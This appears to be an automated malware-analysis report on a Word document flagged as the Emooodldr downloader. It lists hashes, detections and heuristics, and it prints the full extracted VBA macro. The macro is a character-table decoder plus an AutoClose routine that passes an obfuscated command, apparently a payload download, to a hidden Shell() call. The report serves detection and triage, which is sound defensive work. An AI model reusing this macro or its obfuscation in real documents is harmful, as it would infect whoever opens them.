Emooodldr — Office (OOXML) malware analysis

Static analysis result for SHA-256 bb06ec141b6382a1…

MALICIOUS

Office (OOXML)

35.9 KB Created: 2017-10-25 18:34:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2019-05-16
MD5: a7efde4e103890f2974ab7e9eab9d1c2 SHA-1: 9f9d34ff665c799ae2ec996796f5f7b18d7500f8 SHA-256: bb06ec141b6382a111c20c70898b161f2287dda44a7024b949cc91fab1d3ca62
244 Risk Score

Malware Insights

Emooodldr · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains VBA macros, including an AutoClose macro, which utilizes the Shell() function. This function is used to execute a command that appears to download and run a second-stage payload, as indicated by the ClamAV detection name 'Doc.Malware.Emooodldr-6711604-0'. The reconstructed string passed to the Shell function is '18051337495243371919151623003721150939184252521516100534344232201507263713162729303721061514395206373424263706240337291019513732065024410513321905422012511937074043060618043838050525255200002100374206', which is likely an obfuscated URL or command.

Heuristics 6

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2010/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2419 bytes
SHA-256: 3a9a75ed139f55cd8e86f919a3b3988250f574c617250de7327190ece1dc46a6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function uscito(pronome As Integer) As String
 Dim vanitoso() As Variant
 vanitoso = Array("x", "I", ";", "W", ":", "o", "t", "(", "$", "B", "C", "v", "F", "w", "S", " ", "-", "X", "p", "l", "d", "c", "g", "E", ".", "q", "N", "O", "G", "b", "j", "+", "n", "=", "m", "u", "\", "e", "/", "y", "'", "D", "a", "h", ",", "?", "k", "V", "T", "r", ")", "i", "s", "P", "f", "A")
 Dim parlato As Integer
 
 For parlato = LBound(vanitoso) To UBound(vanitoso)
   If parlato = pronome Then
    uscito = vanitoso(parlato)
   End If
 Next
 
End Function

Function presenza(orzata As String) As String
  Dim inter As Integer
  Dim rintocco As String
  Dim polenta As Variant
  polenta = trarre(Trim(orzata))
  For parlato = 0 To Len(orzata)
  
    Dim appunto As String
    If (parlato + 1) <= UBound(polenta) Then
    appunto = polenta(parlato) + polenta(parlato + 1)
    parlato = parlato + 1
    rintocco = rintocco + uscito(Int(appunto))
    End If
  Next
  
  presenza = rintocco
End Function

Function trarre(pietra As String)
    pietra = StrConv(pietra, vbUnicode)
    trarre = Split(Left(pietra, Len(pietra) - 1), vbNullChar)
End Function



Public Function benda(bacino As String)
  Shell bacino, 0
End Function

Sub AutoClose()
 Call Application.Run("benda", presenza("180513374952433719191516230037211509391842525215161005343442322015072637131627293037210615143952063734242637062403372910195137320650244105133219054220125119370740430606180438380505252552000021003742064949372421053438325132053842323946342434205440441508373211045553534155485515311540362820052437003740500215140642490616534905213752521508373211045553534155485540362820052437003740021507263713162729303721061514395206373424263706240337291019513732065024410513321905422014064951322207404306061804383805052525520000210037420649493724210534385224184318455120334232394634405002150123170707263713162729303721061514395206373424263706240337291019513732065024410513321905422014064951322207404306061804383852324218214942214619375243050624210534381318162105320637320638351819054220523855471421423224422106510532405050"))
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 11776 bytes
SHA-256: d62322d8c677b8e2e9757b4c4ec25db0ce1b5b9fc18417fbfc4da23334908857
Detection
ClamAV: Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.